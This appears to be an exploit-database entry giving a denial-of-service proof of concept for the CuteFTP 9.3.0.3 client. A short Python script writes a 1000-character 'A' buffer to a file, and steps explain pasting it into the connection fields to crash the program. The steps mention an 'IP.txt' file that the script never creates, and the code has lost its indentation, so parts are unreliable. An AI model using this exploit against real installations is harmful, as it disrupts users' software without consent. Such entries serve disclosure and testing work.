CuteFTP version 9.3.0.3 suffers from a denial of service vulnerability.
4d724b521f12e32e578cd5a1eed89b0b925d032e4efcb249aa1ec8648a2b4e8a
# Exploit Title: CuteFTP 9.3.0.3 - Denial of Service (PoC)
# Date: 2018-11-05
# Exploit Author: Ismael Nava
# Vendor Homepage: https://www.globalscape.com/cuteftp
# Software Link: https://www.globalscape.com/cuteftp
# Version: 9.3.0.3
# Tested on: Windows 10 Home x64
# CVE : n/a
# STEPS
# Run the python exploit script, it will create a new .txt files
# Open the program CuteFTP
# Copy the content of the file "Cute.txt"
# Paste the content in the fields Host, Username and Password
# In the field "Hostname or IP" paste the content of the file "IP.txt"
# Click in Connect
# End :)
buffer = 'A' * 1000
try:
file = open("Cute.txt","w")
file.write(buffer)
file.close()
print("Archive ready")
except:
print("Archive no ready")